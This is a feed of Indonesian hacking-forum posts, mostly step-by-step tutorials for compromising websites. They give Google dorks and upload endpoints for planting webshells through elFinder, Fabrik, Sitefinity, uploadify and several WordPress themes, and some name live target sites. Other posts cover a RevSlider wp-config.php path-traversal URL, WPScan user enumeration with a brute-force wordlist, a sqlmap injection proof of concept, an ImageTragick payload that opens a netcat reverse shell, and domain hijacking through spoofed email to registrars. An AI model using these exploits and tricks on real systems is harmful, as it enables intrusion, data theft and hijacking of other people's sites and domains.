BackBox Indonesia - Web Attack

Membuat virtual lab untuk pentest ( Docker Backbox )

Wed, 02 May 2018 07:20:37 +0000

Oke kali ini saya akan share pengalaman saya dalam melakukan penetrasi jika kita ingin tetap anonim dalam melakukan serangan dari publik menggunakan container backbox.
Dalam judul kali ini saya akan membahas bagaimana caranya vps kita bisa di remot dari browser kita, penasaran bukan??
Caranya cukup sederhana, pertama kita install terlebih dahulu docker dengan mengetikan perintah ini di vps ubuntu kalian.

Code:
$ sudo apt-get install docker.io

setelah itu kita download container backboxnya dengan mengetikan perintah ini

Code:
$ sudo docker pull claudioviviani/backbox4browser-xfce-full

$ sudo docker run -t -i -d -p 6080:6080 claudioviviani/backbox4browser-xfce-full

Cukup mudah bukan cara installasinya?? hehe
Kalo sudah terinstall kita coba buka ip vps kita di browser dengan menambahkan port 6080. Kurang lebih tampilannya seperti ini.

Di sini kita sudah menginstall container backbox di vps kita.
Untuk masuk ke mode root password defaultnya adalah

Code:
Pass : bbuser

Note : password sebaiknya kalian ganti setelah installasi, karena untuk menghindari agar containernya tidak di otak atik oleh orang lain.

Di sini posisi container kita port nya masih bisa di akses publik, alangkah baiknya vps kita di tutup portnya menggunakan firewall. Kalian bisa menggunakan iptables atau ufw ( unix firewall ) untuk menutup port tersebut. Setelah itu kalian install server openvpn di vps kalian agar si container tidak di akses oleh sembarang orang.

Sedikit tips aja jika kalian ingin tetap anonim di dalam container yang telah kita buat, kita bisa menggunakan tor di browser kita.
Setingnya kurang lebih seperti ini

atau kalo di terminal kita ingin menggunakan tor juga kita bisa menggunakan tsocks.

Mungkin cukup sekian pembahasan kali ini. Kurang lebih nya mohon di ma'lum. hehe

ASK

Thu, 20 Oct 2016 07:38:47 +0000

gimana cara nyari halaman login admin sebuah web ?

Upload Webshell from Uploadify Plugin

Thu, 13 Oct 2016 07:44:18 +0000

Hallo member disini sekalian, first thread disini nih :) jadi kalo ada salah kata atau apapun mohon koreksinya ya para suhu disini ..

Oke kali ini gw bakalan bahas gimana cara kita upload backdoor lewat plugin yang namanya uploadify, caranya simple sih. Cuman modal buat form lalu arahin actionnya ke file uploadify.php. Sorry untuk dork nya gw gak tau :( soalnya ini gw scan web di tempat kerja gw, terus nemu folder uploadify, mungkin para suhu bisa nambahin gimana cari target uploadify berdasarkan dork nya

Step :

Spoiler

Sekian tutor sederhana dari gw ini, mohon kalo ada salah kata atau apapun deh gw minta koreksi dari para suhu disini sekalian, thanks before :D

kod0kk

brute force pass wordpress menggunakan wpscan

Sun, 04 Sep 2016 19:53:45 +0000

maaf sebelumnya hanya share aja mengenai penggunaan wpscan
kalo misal trit ini kurang bermutu silahkan dihapus gak papa.
disini ane cuma share aja penggunaan tools wpscan yang ada di BBox
penggunaan wpscan bisa dibilang cukup mudah
untuk beberapa website mungkin kita bisa melihat pengguna yang ada dalam wordpress victim tapi gak semuanya, karena mungkin victim menggunakan fasilitas premium dan penggunaan cms nya bertujuan agar pemilik web mudah dalam menggunakan cms ini.

untuk melihat username wordpress bisa menggunakan command
sudo wpscan --url http://www.victim.com --enumerate u

lihat hasil di akhir proses biasanya muncul

Code:
Enumerating usernames ...

[+] Identified the following 2 user/s:

    +----+--------+-------------+

    | Id | Login  | Name        |

    +----+--------+-------------+

    | 1  | admin  | admin       |

    | 2  | bnovak | Brian Novak |

    +----+--------+-------------+

klo ga muncul lihat aja cari vuln plugin nulled ato gak update hasil scan tadi dengan tanda warna merah.

setelah menemukan username:
langkah selanjutnya mesti lebih greget,
beda dengan menggunakan vuln dari revslider

Code:
http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

kita dapat langsung ememiliki usernam dan password tinggal mencari lokasi phpmyadmin dr web target

kita mesti memiliki wordlist yang cukup banyak,
dengan menggunakan wpscan dengan command

Code:
--url www.example.com --wordlist darkc0de.lst --username admin

proses ini cukup butuh waktu.bahkan terkadang wordlist yang digunakan gak mendekati.
biasanya wordlist yang digunakan hasil download.
saran ane sih kita mesti lebih pinter dalam mengolah wordlist, wordlist yang digunakan sebaiknya mendekati victim dengan arti kita cari tau ttg email victim search aja nama admin yang kalian temukan , misalkan dari data diatas pengguna nya bernama admin biasanya karakter ini pemalas mungkin saja username dan pass yang digunakan

Code:
username:password

admin:admin

admin:adminadmin 

admin:Adminadmin

admin:ADMINADMIN

admin:admiN

admin:!n1p455w0rd

admin:passw0rd

semacam itulah wordlist yang bisa digunakan

ya begitu lah cara membuat wordlist yang baik menurut ane, dibandingkan download wordlist ber giga2 tapi isinya kamus.
menurut ane wordlist yang dibuat dengan "mendekati" victim lebih baik, tanggal lahir nama pacar tanggal lahir tanggal jadian,dll tergantung mood anda.

[ASK] Cara Hack Akun Facebook tanpa phising

Sat, 27 Aug 2016 07:27:23 +0000

Misi gan, saya newbie niy.

Mau nanya ada gk cara hack akun facebook tanpa harus menggunakan web phising (site cloner)

Akun saya ada yang hack gan trus emailnya gk bisa dibuka.

[ASK] Tentang Exploit ImageTragick

Thu, 25 Aug 2016 05:14:44 +0000

Code:
push graphic-context

 viewbox 0 0 640 480

 fill 'url(https://127.0.0.0/ipinganteng.jpg" | nc -e /bin/sh 192.168.1.226 "31337)'

 pop graphic-context

"fill 'url(https://127.0.0.0/oops.jpg)" ini ip/url target atau apa ?

dan bagaimana caranya mengetahui port dan ip yg sedang listening, contoh "192.168.1.226 31337"

CMS sitefinity exploit help

Sun, 14 Aug 2016 20:50:36 +0000

Assalam o alaiakum,

I need help brothers to shell the site which is running sitefinity CMS .

Code:
roshan.af

Looking forward for your kind response.

Regards
Scorpoin

[ASK] Bagaimana cara Attack Ftp di backbox

Sun, 31 Jul 2016 10:38:20 +0000

Mungkin ada yang mau berbagi ilmu dengan saya cara attack ftp di backbox

How to Fix Update Wpscan on BackBox

Thu, 21 Jul 2016 05:40:52 +0000

Ciee ketemu lagi dengan saya di Thread How to Fix Update Wpscan on BackBox semoga betah membaca yaa

Ceritanya begini tadi malem saya dapat challenge dari teman saya yang merupakan salah satu developer Open Source *************** dia menyuruh saya untuk jebol web wordpress yang dia buat maka dari situ saya coba pahami alurnya dan melihat tools di Backbox saya dan ketemu dengan wpscan ini

Pada saat penggunaan muncul permasalahan seperti ini
anggap sudah masuk ke foolder root ketika saya mengetikan

Code:
Ruby wpscan.rb --url site.com

Muncul perintah untuk update dan saya ketikan perintah ini

Code:
ruby wpscan.rb --update

Pada saya mengetikkan perintah di atas muncul error seperti gambar ini

Code:
[!] plugins.json: checksums do not match

(local: 51b7aaeef00e4409157da221a97bc2636f73b06b9a58277e78b958fb14f8d348f57f3e2119bba28133900cf991a63e695c7bf8400c5b16c5c8301b084939a36b

remote: 21b9e91faf217a366553c2e911ce5efdc34f8191ba3c2cd9b1614d9ae2515b2070c142958fec98c8a1002342b0dea8968a3a9142dabf715bc0e770d1282429ac)

Saya terus mencoba bertanya Kepada segenap teman-teman saya dan mereka juga tidak mengetahuinya
Ngubek2 Github gak ada yang fix pada akhirnya saya coba sendiri dan bisa

Untuk caranya seperti dibawah ini

Saya coba dengan cara scan web wordpress

Code:
ruby wpscan.rb --url site.com

Nanti ada perintah do you want to update ? [Y]es [N]o [A]bort, default: [N]

Ketik saja N
Dan ulangi terus sampe dia lelah kamu Phpin dia minta update ketik N saja ::) kira2 15 x la

Setelah itu masukin perintah ini

Code:
ruby wpscan.rb --update

Dan pada akhirnya munculnya Notifikasi seperti ini

Selamat toolsnya anda berhasil di Update Sebenarnya cara ngefixnya simple cuman untuk bisa complete saya harus begadang sampe jam 5 pagi dan foto ini saya ambil di pagi hari karena capek sangat bro ngescan terus

Intinya Jangan Pernah Menyerah Dalam Menemukan Error dalam Opensource Kalian So Keep Attack and Defence

Quote:" Cintailah Pasanganmu sekedarnya saja jika pada akhirnya bukan dia yang nantinya menemani hidupmu untuk selamanya "

How to install Vulnerability Scanner Vega on Backbox

Wed, 20 Jul 2016 15:08:05 +0000

Setelah melalui banyak rintangan yang dihadapin di dunia open source ini kali ini saya akan share bagaimana cara instalasi Vulnerability Scanner Vega di Backbox tanpa banyak cekcok kita langsung eksekusi !!

Pertama-tama anda harus download terlebih dahulu toolsnya di https://subgraph.com/vega/download/ supaya lebih mudah saya buatkan command linenya seperti di bawah ini

Untuk versi 32bit

Code:
$ wget https://dist.subgraph.com/downloads/VegaBuild-linux.gtk.x86.zip

$ unzip VegaBuild-linux.gtk.x86.zip

Untuk versi 64bit

Code:
$ wget https://dist.subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip

$ unzip VegaBuild-linux.gtk.x86_64.zip

Tunggu beberapa menit setelah itu anda masukan command berikut :

Code:
$ cd vega

$ ./Vega

Nah tools Vulnerability Scanner Vega sudah berada di BackBox anda

Maaf jika postingan ini belum sempurna karena manusia tiada yang sempurna begitu juga system yan diciptakannya So keep learn Attack and Defence

Quote:" Cintailah Pasanganmu sekedarnya saja jika pada akhirnya bukan dia yang nantinya menemani hidupmu untuk selamanya "

cfg-contactform Vulnerability File Upload

Fri, 27 May 2016 12:02:58 +0000

iseng2 share exploit lawas, kali aja masih crootz.
btw sekalian nyicip Shell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.

langsung ja, Play with me Baby :heart:

Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"

# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php

Vuln? {"filename":" -001."} *trgantung dork sih

CSRF Upload:

lalu tinggal upload file/shell ente.
kalo berhasil muncul nama shell ente

Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php

untuk code PHP disini

Semoga bermanfaat gengs, maap kalo tutor cupu :D
jgn lupa kunjungin Blog ane juga yak wkkww : TKJ Cyber Art

~ Bye

SUMUR

eXploit Com_Fabrik

Mon, 23 May 2016 03:56:57 +0000

hehehe, pagi Gengs, iseng2 buka folder lawas, eh nemu file isinya webtarget, pas di coba eh ada salah satu yg masih vuln exploit Com_Fabrik nih. haha yowes gua bikin bahan utk tutorial artikel diPorum ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak >.<" . *curhatan mengenang masalalu :'D

yg dah Master Minggir dlu Bebz :heart:

Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com

Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher

dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:
target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Tuh tinggal Upload Shell/File agan saja :D
Lalu Klik Import CSV

Shell/File Akses o.O ?? /media/namashell
cth: target.coli/media/nueenggakpernah.php

Yuk yang regional Jakarta Join Grup FB: BackBox Jakarta Team

xixihi kunjungin Blog ane juga yak :rolleyes: TKJ Cyber Art

semoga bermanfaat Gengs, maap kalo post cupu
waktunya Nue dan tim Katakan Putus cabut dulu gengs,

Bye~

SUMUR

eXploit elFinder Shell Upload Vulnerability

Mon, 02 May 2016 15:22:49 +0000

xixixhi Malam gengs, sorry kalo tutorial cupu hihi #cumasharekok
*nyari Bug mulu, nyari pacarnya kapan* xD
iseng2 share exploit lama, kali aja masih crotz awkakw.

untuk Tutorial Auto exploiter elFinder nya bisa cek dimari -> Auto Exploiter elFinder

yg dah master minggir dlu beb :heart:

DORK:
inurl:/elfinder/elfinder.php.html
inurl:/elfinder/files/

Exploit:
http://site.com/[path]/elfinder/elfinder.html
http://site.com/[path]/elfinder/elfinder.php.html
http://site.com/[path]/elfinder/src/elfinder-src.php.html

dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:
www.target.com/elfinder/elfinder.html

Tuh tinggal Upload File/Shell Lo aja :D

Shell Akses o.O ??
klik kanan di file yg telah di upload, lalu klik get info/klik yang paling bawah
Lalu Klik Deh nama shell agans :3

Atau langsung ke site nya:

http://target.co.li/[path]/elfinder/files/shellkamu.php

Yuk yang regional Jakarta Join Grup FB:
Jakarta BackBox Team

xixihi kunjungin Blog ane juga yak :rolleyes: TKJ Cyber Art

semoga bermanfaat Gengs, maap kalo post cupu
waktunya Nue dan tim Katakan Putus cabut dulu gengs,

Bye~

SUMUR

Cara mendapatkan Username Website berBasis CMS WordPress dengan WPScan

Sat, 30 Apr 2016 14:38:52 +0000

xixixhi, happy sadnight mblo :v akwkwa
udh ramein porum aje awkkwa, moga thread garing ini bermanfaat bebz :heart:
WPScan ini di gunakan untuk mengetahui username pada CMS Wordpress dan juga bisa mengetahui Password, namun jika ingin mengetahui passwordnya harus mempunyai wordlist nya.

langsung aja deh

Pertama" buka Terminal dan ketik kan

wpscan -u (target) --enumerate u

NB: pada --enumerate u , Huruf "U" itu berarti Username, Jika untuk mencari Password ganti aja dengan Huruf "P".

Selanjutnya tunggu hingga scanning nya selesai.

Jika Sudah selesai akan muncul seperti ini.

Disini saya menemukan 5 Username, yaitu
- adminin
- em2ka
- riki
- kartika
- sihono

Selanjutnya bijimana ama password nya o.O ?? seperti yang tadi ane bilang di awal..
dh yee gengs , semoga brmanfaat :cool:
oke saatnya Nue dan tim katakan mampus cabut dlu
#jemputdoidlu :cool:

SUMUR

eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability

Tue, 26 Apr 2016 08:22:40 +0000

xixixhi siang gengs, sorry kalo tutorial cupu hihi #cumasharekok
*nyari Bug mulu, nyari pacarnya kapan* xD
iseng2 share exploit lama, kali aja masih crotz awkakw.

yg dh master minggir dlu beb :heart:

Dork :
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"

Exploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

Ciri ciri Vuln o.O ?
Muncul form Upload kak :D

Langsung Upload Shell/file

Shell/file Akses: http://www.target.co.li/Files/namafilemu

Live target:

http://www.borrowmind.com/
http://www.belco.org/

Yuk yang regional Jakarta Join Grup FB:

BackBox Jakarta Team

xixihi kunjungin juga blog ane :rolleyes: TKJ Cyber Art

semoga bermanfaat Gengs, maap kalo post cupu
waktunya Nue dan tim Katakan Putus cabut dulu gengs,

Bye~

SUMUR

Exploit WordPress Qualifire Themes

Tue, 22 Mar 2016 11:54:43 +0000

Malam Gengs, *nyari bug mulu, kapan nyari pacarnya :D :D :D
iseng2 share exploit lama, kali aja masih crotz awkakw.

yg dh master minggir dlu beb

Play with Me , Baby

Dork :
inurl:"/wp-content/themes/qualifire"

Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe

Copy Script Upload CSRF:
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
Filename:

lalu tinggal upload file/shell ente.
kalo berhasil muncul angka 1

Shell/file Akses: http://www.target.co.li/filemumas

semoga bermanfaat Gengs, maap kalo post cupu
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk dah UAS awkakw

Bye

SUMUR

Auto Exploit whmcs (google + hotbot)

Mon, 21 Mar 2016 07:18:20 +0000

:D mau bagi" tools auto exploiter comot di https://pastebin.com/at0aFXkq

POC : https://www.exploit-db.com/exploits/29065/

Exploit Raw Marketing CMS - SQL Injection Vulnerability

Thu, 17 Mar 2016 08:52:00 +0000

Salam Kenal,
Member Baru,

Exploit ini cuma sekedar pembelajaran

Code:
# Exploit Title: Raw Marketing CMS - SQL Injection Vulnerability

# Date: 24/01/2015

# Exploit Author: Local Host

# Author Homepage: pasuruanblackhat.org

# Version: All Version ( Under 2015)

# Tested on: Ubuntu 14.04

Overview : 

        The CMS is vuln on all .php?id= , so you only search .php?id= in the website. you know if the website is use Raw Marketing CMS only give /cms/ in the url . and you can see login admin Raw Marketing CMS, usually the CMS in AU, because the vendor of this CMS is australian people. The SQLI error is not show warning, just show not perfectly page. Iam reported to vendor but not responsive, It's not joke

PoC : 

        http://www.website.com.au -> http://www.website.com.au/product_detail.php?id=1

        sqlmap -u http://www.website.com.au/product_detail.php?id=1 --dbs

Greet : 

        Pasuruan Blackhat & Pasuruan Cyber Crew 

        phiA , Alliend , 1pan , h3ll0s , 1nspiron , p3707 , Dark Wireless , h4715 , Sychul

Atau bisa lihat disini 0day.today

Exploit WP-Store Upload Vulnerability

Sat, 12 Mar 2016 14:17:28 +0000

xixixhi malam Gengs, ciee malam minggu yak ? awkawkaw kok gak ngapel x_O? malah sibuknyari exploit dimari awkwka.
*nyari Bug mulu, nyari pacarnya kapan* xD
iseng2 share exploit lama, kali aja masih crotz awkakw.

yg dh master minggir dlu beb :heart:

Play with Me , Baby :P

Dork :
inurl:/wp-content/themes/WPstore/

WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework
frameworkold
Theme bisa diganti *ganti pada bagian belakangnya itu lho*

Exploit: /wp-content/themes/WPStore/upload/

Ciri2 Vuln x_O ?
Muncul tempat Uploader Omz

langsung ae Upload Shell Lo Gengs..

Shell Akses: target.co.li/wp-content/uploads/products_img/namashell.php

Done x_O

Baca juga thread gue sebelumnya gengs: http://www.backboxindonesia.or.id/thread-26.html
Kunjungin Blog saya plis :D : TKJ Cyber Art

semoga bermanfaat Gengs, maap kalo post cupu
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna mau Ngapel dolo :cool:
Bye

SUMUR

Social Engineering ( use a fake Mail )

Sat, 12 Mar 2016 04:39:33 +0000

Assalamualaikum

halo ketemu lagi dengan saya kcnewbie hehe...
kali ini saya akan menunjukan cara bagaimana Social Engineering pada CS beberapa Domain Registry..
hehe... biasanya takhnik ini digunakan untuk para pentester yang sudah nyerah atau tdak tau lagi mau pake exploit apa yang bisa nembus ini site.. hehhe..

dulu ane pengen banget dapet ini method .. ane tanya tanya ke mastah mastah.. gk ada yang jawab..
trus ada yang beralibi "saya gak pandai bohong" padahal udah soceng lebih dari 1 domain.. :3
tapi tolong para mastah.. jangan pelit ilmu kepada newbie seperti saya :3
tapi saya tak putus asa.. saya cari terus.. eh .. ternyata udah di posting oleh salah satu admin LinuxSec.. yaitu
Yuyud Cllalue Kechhe Cyank mamah Papah...
saya berterimakasih banget ama dia :3 karna post dia saya jadi bisa tau itu method...
pas saya coba.. method yang dia tulis di blognya.. eh :3 malah gk bisa.. pada pinter pinter.. :3

ok deh .. karna ini mengandalkan otak.. :3
jadi ane improve aja deh.. ane cari aja celah omongan si CS :3 berikut cara dan gambar historynya..

tapi sebelumnya siapkan hosting / whm / cpanel untuk ngebinding domainya ke dns cpanel ente..

gunakan https://emkei.cz/ untuk send fake email ....
rubah email jadi email pemilik domain.. send permintaan ke pihak domain registry...

tiap gambar di baca dari bawah.. :3
thanks